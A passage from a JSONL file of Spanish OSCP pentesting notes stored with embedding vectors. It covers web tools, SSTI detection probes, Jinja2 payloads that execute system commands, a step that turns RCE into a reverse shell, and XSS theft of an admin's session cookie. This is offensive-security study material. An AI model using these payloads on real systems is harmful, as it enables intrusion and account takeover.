-0.0704, -0.03023, -0.0061, -0.04281, 0.07154, -0.05768, -0.06268, -0.00283, -0.05579, -0.11432, 0.06995, 0.008]} +{"tipo": "metodologia", "herramienta": "Hacking web", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "texto": "## Herramientas\n- Burp Suite (intercepta y manipula TODO) + Burp Repeater e Intruder\n- Content discovery (gobuster/feroxbuster/ffuf)\n- `nikto`, `whatweb`, `wpscan`, `cmsmap` → Enumeración web\n\nRelacionado: Recursos públicos (PayloadsAllTheThings, HackTricks) · OSCP MOC", "v": [-0.16635, -0.1391, -0.07197, -0.14554, 0.05547, -0.16361, 0.09453, 0.022, -0.02666, -0.04805, -0.13525, 0.03126, 0.08474, -0.02144, -0.01514, 0.01065, -0.0688, -0.04789, 0.07504, -0.01322, 0.0761, 0.06517, -0.099, 0.045, 0.08006, -0.01122, -0.1426, -0.0236, -0.1699, -0.02743, 0.07299, -0.0106, -0.08831, 0.02931, -0.17863, -0.06053, -0.04921, -0.00019, 0.00082, 0.21825, -0.03591, 0.08869, -0.18375, 0.11385, 0.01526, -0.03654, 0.04638, -0.02077, 0.04432, 0.02922, -0.07963, -0.02829, -0.17424, -0.04762, 0.01296, -0.06994, 0.11666, 0.02786, -0.04629, 0.06465, -0.016, 0.10868, -0.06862, -0.13691, 0.06949, -0.05469, -0.02075, 0.01866, -0.0232, 0.06592, -0.10458, 0.02752, 0.05028, 0.00905, 0.11457, 0.01536, 0.00907, -0.00275, 0.16953, 0.05064, -0.03941, -0.12142, -0.03738, 0.01722, -0.07948, -0.04663, 0.13699, -0.13281, -0.07007, -0.068, 0.173, 0.03456, 0.0148, 0.0116, 0.03556, -0.13443, 0.04511, -0.00382, 0.00856, -0.00258, 0.0308, 0.07499, -0.06719, -0.00689, 0.01445, 0.09758, 0.03787, 0.05724, 0.0308, -0.03363, 0.003, -0.00827, -0.01924, -0.03152, -0.06146, 0.03295, 0.00894, -0.00564, 0.04957, -0.06912, -0.087, -0.0513, 0.01213, -0.03705, -0.00239, -0.01201, -0.01926, 0.04361, 0.04246, -0.03527, -0.05027, -0.02529, -0.09194, 0.04709, 0.01472, -0.10691, -0.04586, -0.02748, 0.09946, 0.00589, -0.00758, 0.00781, 0.06767, 0.0338, -0.03494, 0.02443, 0.13052, -0.02341, -0.05822, 0.00621, 0.07888, -0.0284, -0.0461, -0.0209, 0.04816, -0.03797, -0.04262, -0.05094, -0.01915, -0.00419, -0.02954, 0.00082, -0.02754, 0.0097, 0.06288, -0.00775, -0.04687, -0.04926, -0.05367, -0.07565, 0.01028, 0.00379, 0.01461, -0.05981, -0.01772, -0.09402, 0.00601, -0.05178, -0.0009, -0.04606, -0.00254, 0.01445, 0.06689, 0.04801, -0.04619, -0.06549, -0.00322, 0.02095, -0.02866, -0.0113, 0.06324, -0.01404, 0.02728, -0.04684, -0.00872, -0.03271, -0.01211, -0.0082, 0.02884, -0.03287, -0.01586, -0.06162, -0.02918, -0.05063, -0.02052, -0.00478, 0.01948, 0.00397, -0.05392, 0.02153, 0.05161, -0.0155, 0.04353, -0.07734, -0.04401, -0.01378, 0.06433, -0.00385, -0.10738, 0.01514, 0.01567, 0.10081, 0.03499, 0.0062, 0.02782, 0.01255, 0.0395, 0.03393, 0.02396, -0.03309, -0.02485, -0.01552, 0.0149, -0.0393, 0.06275, 0.01974, -0.00396, 0.02191, -0.0702, -0.04566, 0.02456, 0.01369, -0.00263, -0.03137, 0.02182, -0.11558, -0.06066, 0.03347, 0.02199, 0.00824, -0.01413, -0.00898, -0.0245, -0.04625, 0.03314, -0.03313]} +{"tipo": "metodologia", "herramienta": "SSTI", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "texto": "# SSTI (Server-Side Template Injection)\n\n> Tu input entra en una plantilla del servidor (Jinja2, Twig, Freemarker...) y se **evalúa** → RCE. Vector de Hacking web.", "v": [-0.02157, -0.17068, -0.27331, -0.12895, 0.10043, -0.16483, -0.08179, -0.11984, 0.26145, 0.11402, -0.06157, -0.06012, 0.09375, -0.00444, 0.09882, 0.12315, 0.07861, -0.27068, 0.09158, 0.04449, 0.04799, 0.09798, -0.00305, 0.00556, -0.01204, 0.07374, -0.03099, -0.01179, -0.07862, -0.01344, 0.1173, -0.08101, 0.05246, -0.07461, -0.02115, -0.11159, 0.02241, 0.0273, -0.02994, 0.13572, 0.01848, 0.05692, -0.12466, -0.03689, -0.04772, 0.03655, 0.15918, 0.05134, 0.14693, 0.07598, -0.05025, -0.02266, -0.0314, -0.0002, 0.03615, 0.01835, 0.14113, -0.03988, 0.0018, -0.11631, -0.00799, 0.06358, -0.07807, -0.1197, 0.04507, -0.03385, 0.04268, -0.02889, -0.01593, -0.03847, -0.00714, 0.01971, -0.01299, -0.20733, 0.10126, -0.03213, 0.02458, 0.03567, 0.03605, 0.05331, -0.01313, -0.00066, 0.0054, 0.05375, -0.05766, 0.02777, -0.01081, -0.06175, 0.02276, -0.00351, 0.11394, 0.02873, -0.01395, 0.06296, -0.01405, -0.11144, 0.05381, 0.00852, 0.06958, -0.07124, 0.02, 0.04663, -0.04089, 0.03151, 0.07412, 0.05403, 0.09982, -0.07606, 0.02815, -0.05785, 0.07699, 0.00797, -0.06261, 0.00939, -0.07507, -0.07488, 0.00646, 0.11146, 0.01046, 0.04887, -0.07932, -0.07511, 0.00254, -0.00135, -0.01117, -0.00803, -0.0135, 0.00906, 0.00115, -0.09533, -0.0265, -0.04095, -0.03735, -0.00062, -0.05448, 0.00325, 0.04825, -0.05458, -0.02831, 0.02518, -0.00672, 0.00653, -0.00375, 0.04153, 0.09862, -0.00845, 0.09567, -0.03381, -0.07694, 0.02953, 0.03067, 0.01296, 0.01062, 0.04537, -0.0293, -0.08009, 0.00122, -0.09369, -0.03364, 0.0431, 0.03429, 0.01321, -0.00837, 0.05014, 0.00405, 0.0146, 0.00378, -0.04123, -0.03008, -0.00028, 0.00761, 0.0166, -0.01219, -0.03121, 0.00957, -0.02874, -0.00093, -0.05864, 0.01167, -0.0043, 0.04114, -0.05363, -0.01028, 0.02915, -0.00774, -0.0329, -0.02292, -0.04135, -0.00346, 0.03714, 0.02288, 0.02795, -0.02117, 0.04381, 0.03631, -0.0057, 0.01312, -0.05801, 0.03659, -0.04964, -0.05999, -0.04902, -0.06392, -0.01947, -0.02929, 0.02501, -0.00011, -0.00588, -0.02329, 0.0062, 0.01358, -0.04041, 0.0494, -0.05531, -0.03679, -0.01221, 0.03122, -0.00044, 0.05131, -0.01014, -0.02263, 0.07192, 0.01634, -0.00836, -0.01307, 0.01384, 0.01673, 0.04156, 0.01325, 0.00089, -0.01953, 0.00189, -0.02001, -0.0722, -0.01964, 0.02244, -0.01463, -0.02664, -0.02132, -0.02073, 0.02423, 0.03214, 0.00561, -0.03655, 0.01056, -0.10858, -0.01655, -0.02827, 0.00453, -0.00942, -0.02323, 0.01295, -0.00877, -0.05004, 0.01428, -0.00497]} +{"tipo": "metodologia", "herramienta": "SSTI", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "texto": "## Detección\n```\n{{7*7}} → si responde 49 → vulnerable (Jinja2/Twig)\n${7*7} → Freemarker / otros\n<%= 7*7 %> → ERB (Ruby)\n#{7*7} → Ruby/otros\n```\nSi `{{7*7}}` devuelve `49` (no el literal), hay SSTI.", "v": [-0.11593, 0.01537, -0.10832, -0.01703, 0.07491, -0.06124, -0.08645, -0.01443, 0.07527, 0.02918, -0.06369, -0.0813, 0.08842, -0.05142, 0.07372, -0.00093, -0.18235, -0.00053, -0.08203, 0.03031, 0.04628, -0.05691, 0.00611, -0.02067, -0.0001, 0.0716, 0.02779, 0.06032, 0.04981, -0.00487, 0.09959, -0.02229, -0.1267, 0.00014, -0.0249, 0.09335, -0.04197, -0.01915, -0.08463, 0.11223, 0.05154, -0.05217, -0.02598, 0.02943, -0.02833, 0.15685, -0.01789, 0.00659, 0.03813, 0.00848, 0.0019, -0.06291, -0.05578, -0.09736, 0.04885, -0.10919, -0.01222, -0.02199, -0.02288, 0.01026, 0.05015, 0.06136, -0.08053, -0.10077, 0.11985, -0.00526, -0.02251, -0.06214, -0.05028, 0.03389, 0.04629, -0.10953, -0.05313, -0.06522, 0.06695, -0.02382, 0.00689, -0.00473, 0.04328, 0.07834, -0.05931, -0.07638, -0.03375, 0.03344, 0.02212, -0.07176, 0.0009, -0.01865, 0.02481, 0.02299, 0.12234, -0.05982, -0.01313, 0.06349, -0.04814, 0.01161, -0.00496, 0.1461, 0.1363, 0.11019, 0.03739, -0.0473, 0.109, -0.0702, -0.02713, 0.03882, 0.0849, -0.08288, -0.06788, -0.05291, 0.05694, 0.04601, 0.03286, -0.04827, 0.01946, 0.08268, 0.01778, 0.03538, 0.02658, 0.00113, -0.01091, 0.08259, -0.02226, 0.00575, 0.15536, -0.06568, 0.10547, 0.05705, -0.03957, 0.01008, 0.03214, 0.03415, -0.07954, -0.01947, 0.01347, 0.09913, 0.00698, -0.06484, 0.1092, 0.01208, 0.04748, 0.03795, 0.12013, 0.12349, 0.04759, -0.02003, 0.01835, -0.09635, 0.00065, 0.00117, -0.09078, 0.04594, 0.01396, 0.0328, -0.01085, -0.06343, 0.03181, 0.03159, 0.03101, 0.03779, 0.00931, 0.05763, -0.0506, 0.0541, -0.05955, -0.15568, -0.10835, -0.06943, 0.10152, -0.04379, -0.08458, 0.02257, -0.07364, -0.00978, -0.05464, -0.03781, 0.01267, -0.06144, -0.0303, -0.0294, -0.0211, 0.03261, -0.03393, 0.05718, -0.04568, 0.03797, 0.01567, -0.04403, -0.06371, 0.05371, 0.01065, -0.08679, -0.03861, 0.09229, -0.06288, -0.06934, 0.006, -0.0811, 0.00907, -0.06899, -0.00714, 0.03913, 0.0107, 0.04453, 0.04178, 0.01959, -0.07654, 0.03066, -0.06964, 0.00615, -0.05305, -0.03779, -0.04547, -0.16915, -0.04443, -0.03107, -0.03365, 0.06679, -0.00663, -0.0005, -0.02897, 0.06232, 0.07923, -0.0253, -0.0855, 0.11677, -0.01957, -0.07861, 0.10526, -0.02238, -0.04413, 0.04064, 0.05069, -0.02951, 0.10942, -0.04126, 0.02052, -0.09954, -0.17587, 0.01404, -0.02877, 0.02098, 0.00039, 0.04053, 0.00113, -0.02056, 0.01229, -0.07447, 0.10443, -0.04345, -0.02508, 0.03289, -0.00867, -0.06639, 0.03018, 0.04597]} +{"tipo": "metodologia", "herramienta": "SSTI", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "texto": "## Identificar el motor\nUsa el árbol de polyglots de PayloadsAllTheThings (Recursos públicos) o **tplmap** para automatizar.", "v": [-0.12898, -0.09499, -0.02774, -0.20294, -0.02884, -0.03562, 0.12513, -0.03923, -0.1103, 0.04566, -0.12906, -0.02476, 0.20396, 0.14123, -0.0628, -0.07778, -0.0689, -0.09003, 0.01285, 0.01083, -0.02655, 0.06518, -0.18192, -0.11182, 0.01244, 0.08707, -0.01472, -0.09801, -0.25818, 0.06312, -0.04184, 0.06214, -0.06591, -0.1197, -0.09492, -0.07954, 0.12617, 0.17507, -0.06165, 0.0074, -0.11082, 0.0037, -0.10627, 0.09731, 0.01784, 0.06694, -0.00341, 0.00305, -0.04405, -0.0079, -0.12086, 0.06237, -0.15468, -0.0658, 0.03302, -0.07748, 0.05365, -0.04002, -0.03582, 0.01713, -0.05582, 0.01827, -0.12528, -0.01762, -0.04766, -0.00944, 0.08711, 0.05037, -0.01741, -0.03194, -0.06843, -0.05997, 0.11637, -0.06288, 0.07265, 0.07147, 0.00819, -0.08222, 0.03301, 0.09592, -0.01401, -0.16784, -0.03987, -0.07231, 0.00284, 0.05345, 0.07463, -0.08238, 0.03228, -0.09594, 0.00191, 0.07415, -0.04406, 0.08332, 0.04281, 0.03673, -0.05028, -0.03119, 0.00671, 0.05026, 0.08931, -0.0044, 0.0119, 0.0216, 0.06085, 0.04067, 0.01608, 0.00785, 0.01698, 0.01047, 0.04642, -0.03876, -0.00194, 0.07499, -0.03937, 0.01538, 0.00293, -0.05585, 0.02382, -0.01427, -0.00174, 0.01601, 0.01886, -0.02802, 0.03014, 0.00137, -7e-05, 0.12933, -0.00868, 0.01453, 0.04512, 0.05893, -0.10958, -0.00839, -0.05376, 0.02152, 0.06797, -0.05432, 0.00433, 0.0347, 0.02604, 0.05656, -0.00495, 0.02652, 0.00425, 0.01523, -0.01239, -0.04081, -0.05809, 0.03254, 0.06333, 0.0363, 0.04676, -0.03576, 0.0444, -0.04979, -0.03927, 0.05712, 0.00565, -0.0281, -0.02845, -0.05546, 0.01618, 0.02922, 0.01863, 0.05067, -0.01319, -0.04454, 0.04076, -0.02636, 0.07733, -0.00379, 0.03145, 0.03082, 0.0006, -0.08444, 0.00847, -0.06281, -0.00196, 0.09518, -0.10862, 0.0159, 0.01886, -0.00067, -0.04057, -0.00298, 0.04991, -0.07191, 0.01789, -0.00962, -0.02809, 0.03776, 0.01207, -0.02983, 0.02022, 0.01737, -0.01488, -0.01182, 0.03583, -0.05411, -0.03751, 0.01081, -0.07998, -0.02009, 0.02505, 0.02187, 0.04951, 0.00143, -0.03674, 0.03768, 0.07948, -0.01324, 0.08886, 0.01582, 0.01125, -0.03381, -0.06632, -0.00233, -0.07145, 0.00835, -0.00117, 0.07268, -0.01995, 0.0505, 0.01576, 0.04124, 0.01554, 0.01272, 0.06671, -0.01808, -0.14033, 0.06009, 0.03395, 0.01701, 0.05524, -0.02717, -0.01609, -0.00824, -0.07361, -0.07995, 0.0534, 0.01442, -0.05173, -0.047, -0.01346, -0.03439, -0.04542, 0.03086, -0.006, 0.00765, 0.00033, 0.00483, -0.01725, -0.04592, -0.01473, -0.07951]} +{"tipo": "metodologia", "herramienta": "SSTI", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "texto": "## Jinja2 (Python) → RCE\n```python\n{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}\n{{ cycler.__init__.__globals__.os.popen('id').read() }}\n```", "v": [0.05091, -0.09127, -0.01098, 0.00891, 0.20399, -0.18011, -0.06096, -0.04048, -0.05074, -0.03416, 0.05566, -0.00523, 0.01546, 0.07589, -0.09013, -0.02211, -0.12804, -0.06162, -0.11681, 0.0137, -0.12878, -0.00168, -0.06722, -0.091, 0.06624, 0.1097, -0.01364, 0.00671, -0.11866, 0.04876, 0.01953, 0.00778, -0.0739, -0.06693, -0.18037, -0.09091, -0.01154, 0.09926, -0.12624, 0.10523, -0.17577, -0.07542, -0.12242, 0.10391, -0.04537, 0.01727, 0.09752, 0.08801, -0.01389, 0.01541, -0.10544, 0.00677, -0.04038, 0.00457, 0.08571, -0.02725, 0.11146, 0.01972, -0.08342, -0.0185, 0.02002, 0.11262, 0.03865, -0.00705, 0.11571, -0.03858, 0.02957, -0.03666, -0.04556, -0.00149, -0.15495, -0.01295, -0.03718, -0.05077, 0.13299, -0.05732, -0.07229, -0.0226, 0.03374, 0.05468, -0.02352, -0.14009, -0.00344, 0.01993, 0.12358, -0.10027, 0.09497, -0.03052, -0.02886, -0.02976, 0.07441, -0.00381, -0.0239, -0.01345, -0.03222, -0.02749, 0.00603, -0.02118, -0.01047, 0.06122, 0.00842, -0.02005, 0.06295, 0.06211, 0.04452, 0.08789, 0.03887, 0.02096, 0.00396, -0.07814, 0.08995, -0.02365, -0.00864, -0.1016, 0.0053, -0.05809, -0.12861, 0.03031, 0.00013, -0.00233, -0.00066, -0.06894, 1e-05, 0.02786, -0.02188, -0.00697, 0.01331, 0.0434, 0.03917, 0.01314, 0.02094, 0.03546, 0.0205, 0.00108, -0.07218, 0.03601, 0.04637, -0.00032, 0.11144, -0.04546, 0.04843, 0.09341, 0.09226, 0.04661, 0.00569, 0.05188, 0.03933, -0.12482, -0.05667, 0.06067, 0.04376, 0.01239, -0.02589, 0.03799, -0.00237, -0.04222, -0.05167, -0.05154, 0.03842, 0.03053, 0.03266, 0.09678, 0.08006, 0.03781, 0.02117, -0.05483, -0.00338, -0.06626, 0.03939, -0.0665, -0.02174, -0.02797, -0.0924, -0.01032, 0.01308, -0.10567, 0.06019, -0.07434, -0.01368, -0.04823, -0.03032, -0.03901, -0.03318, 0.01455, -0.04387, -0.02929, -0.03218, -0.04336, 0.0215, 0.03134, 0.06708, 0.07679, -0.01748, -0.01651, -0.02781, 0.04389, -0.0389, 0.04163, 0.04258, -0.03887, -0.05834, -0.02264, -0.00772, 0.00958, 0.08668, 0.04857, -0.06091, 0.08497, -0.00845, -0.0098, 0.02597, -0.06787, 0.04367, 0.02593, -0.02045, -0.09028, -0.00376, 0.06321, 0.02229, 0.01882, -0.02642, 0.06509, 0.06211, -0.00579, -0.06199, 0.06828, 0.03351, 0.02828, 0.0782, 0.01696, -0.12968, 0.01656, -0.05617, -0.05265, 0.04396, 0.01858, 0.00394, -0.02065, -0.06003, -0.04553, 0.04093, 0.08436, 0.00411, -0.09437, 0.00351, -0.01973, -0.10116, 0.02461, 0.04925, -0.06955, -0.07533, 0.0048, 0.02201, -0.10341, 0.03119, -0.01394]} +{"tipo": "metodologia", "herramienta": "SSTI", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "texto": "## De RCE a shell\nInyecta el comando de Reverse shell dentro del payload → listener en Kali.\n\nRelacionado: Command injection · XSS · OSCP MOC", "v": [-0.02032, -0.10941, -0.06897, -0.06904, -0.03234, -0.22552, -0.04279, 0.03763, 0.04668, 0.10353, -0.10942, -0.0483, 0.03895, -0.16431, 0.04794, 0.11884, -0.03009, 0.1196, -0.11874, -0.12142, -0.00312, -0.03752, -0.08229, 0.04937, 0.07991, 0.26193, -0.03136, 0.003, -0.02708, -0.13455, -0.08117, -0.08288, 0.00819, 0.02621, -0.08691, -0.00631, -0.12562, 0.01206, 0.04056, 0.20582, -0.09345, 0.07325, -0.23901, 0.17132, 0.16402, -0.04963, 0.10524, 0.04418, 0.10463, -0.00913, -0.00449, -0.03057, -0.16695, 0.09551, 0.0224, 0.02855, 0.10442, -0.0674, 0.00089, -0.02861, -0.09146, 0.00187, -0.00436, -0.01287, -0.05049, -0.02461, -0.0807, -0.09076, -0.04357, -0.0378, -0.05299, 0.01299, -0.03736, 0.03321, 0.01657, -0.07241, 0.0688, -0.01834, 0.12047, 0.08792, -0.04357, -0.05038, -0.08332, 0.07134, -0.01611, 0.00558, 0.05517, -0.0825, -0.00421, -0.00585, 0.06648, -0.03897, -0.06145, 0.10821, 0.12615, -0.04065, -0.01175, -0.01224, 0.0071, 0.00141, 0.01519, 0.05573, 0.01046, 0.06337, 0.0421, 0.03862, 0.05622, -0.10453, 0.11178, 0.04524, 0.09269, -0.12002, 0.02658, -0.0041, -0.0654, -0.08166, 0.01307, 0.00097, 0.02059, -0.04711, -0.10153, 0.04209, 0.01115, 0.03499, 0.01268, -0.04456, -0.06484, 0.02902, 0.08365, 0.03353, -0.01364, 0.034, 0.06585, -0.01663, -0.04899, 0.04276, 0.05455, -0.00216, -0.06284, -0.017, -0.00257, 0.05241, 0.04854, 0.09176, 0.03339, 0.05221, 0.0458, -0.00258, -0.01379, -0.03932, 0.04568, 0.04158, -0.04249, 0.02374, 0.0335, -0.06125, 0.03954, 0.02705, 0.02784, 0.01429, 0.0009, 0.02266, -0.04865, 0.01303, -0.00927, -0.05179, -0.03122, 0.00057, -0.05314, 0.01193, -0.02187, 0.0039, 0.01926, 0.00255, -0.02859, -0.06246, -0.00617, -0.0657, 0.04955, -0.00513, -0.00353, 0.01819, 0.0021, 0.01291, 0.03267, -0.03581, -0.04669, 0.03254, -0.0056, 0.02828, 0.00771, -0.02294, 0.00802, -0.01896, 0.02054, -0.04538, 0.03577, -0.02982, -0.03669, -0.01191, -0.0144, 0.02611, 0.02514, -0.09709, 0.00406, -0.08376, -0.04813, 0.02027, -0.00564, -0.0367, 0.02858, -0.00518, 0.06701, 0.04044, -0.00916, -0.03497, 0.01044, 0.02711, -0.01955, 0.07348, -0.03088, -0.00312, 0.07541, -0.03878, -0.01682, 0.00953, -0.01166, -0.05605, 0.06629, -0.02779, -0.00982, -0.02324, -0.01022, -0.01439, 0.0147, 0.04908, -0.04573, 0.00368, 0.00383, -0.04434, 0.06413, 0.03115, 0.01082, -0.0679, -0.00748, -0.04594, -0.03555, -0.00019, 0.00549, 0.00102, -0.03881, 0.04747, -0.02122, -0.03815, -0.0245, 0.00299]} +{"tipo": "metodologia", "herramienta": "XSS", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "texto": "# XSS (Cross-Site Scripting)\n\n> Inyectas JavaScript que se ejecuta en el navegador de otro usuario. En OSCP pesa menos que SQLi/RCE, pero aparece (sobre todo para robar sesión de un admin). Vector de Hacking web.", "v": [-0.05945, -0.16871, -0.16218, -0.14096, -0.03224, -0.23497, -0.0301, -0.0906, 0.14914, -0.02193, -0.21892, -0.1248, -0.01025, -0.10607, 0.1339, 0.01847, -0.00159, 0.06928, 0.0478, 0.01271, -0.01654, -0.04157, -0.00896, 0.00132, 0.02992, 0.0765, -0.09891, 0.10297, -0.09422, -0.04863, -0.02625, -0.01728, -0.01119, -0.02091, -0.04871, -0.00273, 0.00279, -0.05943, 0.09375, 0.09829, 0.08675, 0.10716, -0.24663, 0.04337, 0.0385, -0.00823, 0.07058, 0.01984, 0.06325, -0.04728, 0.01484, -0.04399, -0.30052, 0.03542, -0.03897, -0.0152, 0.06367, -0.06815, 0.01662, -0.03564, 0.01908, 0.06314, -0.08241, -0.08449, -0.03695, -0.02647, 0.03685, -0.02735, 0.02682, 0.06919, -0.01868, 0.07134, -0.10674, -0.01462, 0.15957, -0.09481, 0.05214, 0.00526, 0.06261, 0.03863, -0.02442, -0.074, -0.07114, 0.08454, -0.06727, -0.01657, 0.03509, -0.04046, 0.0153, -0.01771, 0.12235, 0.08031, -0.031, -0.04499, 0.01492, -0.14965, 0.07845, -0.04754, 0.05639, -0.02009, 0.03716, 0.03456, -0.07729, 0.09809, -0.01367, 0.05104, 0.09521, 0.04107, -0.0041, -0.10597, 0.08559, -0.03442, -0.08121, -0.00179, -0.01654, 0.0265, -0.00227, 0.0269, -0.05486, -0.05647, -0.07964, 0.01541, -0.07807, -0.00366, -0.00126, -0.04062, 0.00873, 0.0452, 0.00037, -0.04668, -0.02272, -0.08183, -0.02901, 0.00269, -0.08363, 0.11881, 0.01731, -0.07495, -0.03756, 0.00692, 0.00939, -0.00195, 0.04189, 0.05943, 0.05443, -6e-05, 0.03173, 0.02098, -0.11377, -0.03568, 0.05625, -0.03543, -0.0266, 0.01088, -0.01898, -0.01811, -0.05725, 0.00505, -0.06127, 0.07085, -0.07971, 0.02748, -0.01672, -0.02107, -0.03565, -0.00784, -0.03103, -0.0133, -0.00299, 0.01591, 0.03891, 0.06355, 0.02176, -0.075, 0.03696, -0.07629, -0.02037, -0.08788, 0.03882, -0.03415, 0.02384, -0.05085, 0.03922, 0.04136, -0.04116, -0.02977, 0.04378, 0.04836, -0.05549, -0.02483, -0.00236, 0.04966, -0.05312, 0.00531, 0.01784, -0.02765, -0.03693, -0.04006, 0.05126, -0.04426, -0.03357, -0.00607, -0.01828, -0.0288, 0.01412, -0.00896, -0.00593, -0.03837, -0.08145, -0.00499, 0.01007, 0.0133, 0.01129, -0.03848, 0.02242, -0.04919, 0.06474, 0.04899, -0.00444, -0.00345, -0.03781, 0.01983, 0.04793, -0.0037, 0.03366, 0.017, 0.00676, -0.0224, -0.01002, 0.00595, 0.00475, -0.04601, -0.04669, -0.02587, 0.02395, 0.05657, -0.03422, -0.00278, -0.01335, -0.047, 0.00965, 0.05717, 0.00059, -0.06821, -0.01621, -0.03939, -0.05942, 0.00389, 0.00903, -0.00259, -0.01218, 0.00081, -0.01841, -0.04456, -0.02892, 0.03797]} +{"tipo": "metodologia", "herramienta": "XSS", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "texto": "## Tipos\n```\nReflected → tu payload vuelve en la respuesta de ESA petición (?q=\n\n\">\n```\nPrueba primero un marcador inofensivo y mira si se **renderiza** o se escapa (en Burp Repeater e Intruder).", "v": [-0.01549, -0.02608, -0.20975, -0.1067, 0.11561, -0.11993, 0.06514, -0.04218, 0.0158, -0.02416, -0.12345, -0.10255, 0.07236, -0.10742, -0.07879, -0.00199, -0.06025, 0.0348, -0.0567, 0.01495, 0.04722, 0.03244, -0.03178, -0.08915, -0.01801, -0.05242, -0.14974, 0.14372, -0.14803, -0.02614, -0.01902, 0.08431, 0.07336, -0.01421, -0.06303, -0.01279, 0.03185, 0.08888, 0.00941, 0.15169, -0.02797, 0.03228, -0.16589, 0.0518, -0.04749, -0.02354, 0.01306, 0.11337, -0.07925, -0.09288, -0.0509, 0.073, -0.08731, 0.06587, -0.04243, 0.03798, 0.14017, -0.05721, 0.0087, -0.01994, 0.0466, 0.04807, -0.06841, -0.07659, -0.03126, 0.01393, 0.05689, 0.03913, -0.03496, -0.08472, -0.02623, -0.01324, -0.04807, -0.05405, 0.07425, -0.02798, -0.0752, -0.04597, 0.05497, 0.07204, -0.00825, -0.06617, -0.04501, -0.01449, -0.0112, -0.11636, 0.00433, -0.07358, -0.02167, -0.09775, 0.12315, 0.02471, -0.02464, 0.02958, -0.02572, -0.08543, 0.06662, -0.07631, 0.06923, -0.00921, 0.06931, 0.0174, -0.03256, 0.03449, 0.21637, 0.07327, 0.07145, -0.11474, 0.0517, -0.04005, 0.06282, -0.13906, -0.00461, 0.00276, -0.08365, -0.00519, -0.08606, -0.01177, 0.09089, -0.03981, -0.0628, -0.0628, 0.03172, -0.04445, -0.01146, -0.05646, -0.08323, 0.01083, 0.01693, 0.03845, -0.08259, 0.06568, -0.08936, -0.10289, -0.05551, 0.05922, 0.06553, -0.00148, -0.04066, 0.00525, 0.02379, 0.06108, 0.09862, 0.0189, 0.0441, 0.04784, 0.03503, -0.1059, -0.09933, 0.04034, -0.02895, 0.08615, 0.0514, -0.0052, 0.05967, -0.00526, 0.02101, -0.02024, 0.03235, 0.01717, -0.00637, 0.09051, 0.07786, 0.09451, 0.03374, -0.03335, 0.01281, -0.05, 0.06601, -0.00095, -0.00597, -0.05318, -0.0352, -0.08184, 0.01097, -0.07673, 0.01745, -0.03673, 0.01942, -0.05655, -0.01377, 0.00579, 0.03468, 0.0735, -0.05141, -0.07725, -0.00235, -0.01034, 0.042, 0.07424, 0.06516, 0.06826, -0.04009, 0.01451, -0.06206, -0.02603, -0.05648, -0.00146, 0.07224, -0.02433, -0.04213, 0.02537, -0.01838, -0.08934, -0.00732, -0.03146, -0.03999, 0.05156, -0.06575, -0.01836, 0.06271, -0.03675, 0.07474, -0.05609, -0.01527, 0.00462, 0.01486, -0.01579, -0.03722, 0.02163, 0.0141, 0.06187, 0.07406, -0.02443, 0.00301, 0.03505, 0.08051, 0.03574, 0.05173, 0.00578, -0.06827, 0.02217, 0.00495, -0.02697, 0.0781, 0.00818, 0.03299, -0.04013, -0.10633, -0.08425, 0.04227, 0.00344, -0.01114, -0.04501, -0.0383, -0.06819, -0.06226, 0.04919, 0.03395, -0.04665, -0.02411, 0.01434, 0.03434, -0.05159, 0.06829, -0.03847]} +{"tipo": "metodologia", "herramienta": "XSS", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "texto": "## Para qué sirve en OSCP\n- **Robar la cookie de sesión** de un admin (XSS stored en un panel que el admin revisa):\n```html\n\n```\n La recibes en tu `python3 -m http.server` → la usas en Authentication attacks.\n- A veces el panel admin tiene una función que escala a RCE / File upload bypass.\n\nRelacionado: SSTI · Authentication attacks · OSCP MOC", "v": [-0.06409, -0.08505, -0.05083, -0.13814, 0.03094, -0.40593, -0.083, -0.08004, -0.0103, 0.11333, -0.19934, -0.18641, -0.01166, -0.00267, -0.00991, -0.07942, 0.02345, 0.07771, 0.14095, 0.04264, 0.0333, 0.01664, -0.0888, 0.04746, 0.10631, 0.1201, 0.02252, -0.0098, -0.13992, -0.15642, 0.10704, -0.01363, -0.04101, 0.00075, -0.08708, -0.07016, -0.01423, 0.03081, 0.03779, 0.22128, -0.06698, 0.01554, -0.06843, 0.12666, 0.03154, -0.04725, 0.06618, 0.08461, 0.0126, -0.01076, 0.03894, -0.06649, -0.11459, 0.07702, -0.03979, 0.07737, 0.05727, -0.08299, 0.01337, 0.04061, -0.0266, 0.10006, -0.08018, -0.0807, 0.03995, 0.01605, -0.02817, -0.05382, -0.06196, 0.03957, -0.04613, -0.0001, -0.03556, -0.05905, 0.07511, -0.0649, 0.04156, -0.00684, 0.1144, -0.01187, -0.04057, -0.04703, -0.06667, 0.06654, -0.06736, -0.02489, 0.02217, -0.13259, -0.01597, -0.01761, 0.07268, 0.06383, -0.05204, -0.04244, 0.02554, -0.06976, -0.00463, -0.06964, 0.07208, 0.00294, 0.0483, 0.02023, 0.00104, 0.07519, 0.10363, 0.00601, 0.00681, -0.01302, 0.06298, -0.04849, 0.03103, -0.02591, -0.03619, 0.02994, -0.05295, 0.01899, -0.09856, 0.0299, -0.0729, -0.03508, -0.06433, -0.00416, -0.03942, 0.0142, -0.06172, 0.01707, -0.03318, 0.13181, -0.06833, 0.02435, -0.07336, 0.00033, -0.04383, 0.0249, -0.09114, 0.04002, 0.03637, -0.04071, -0.00648, -0.03503, 0.05336, 0.0705, 0.07438, 0.06331, 0.04342, 0.03058, -0.01806, -0.01248, -0.02813, 0.01215, 0.03422, 0.0499, 0.06195, -0.01327, 0.00073, 0.00112, -0.0196, 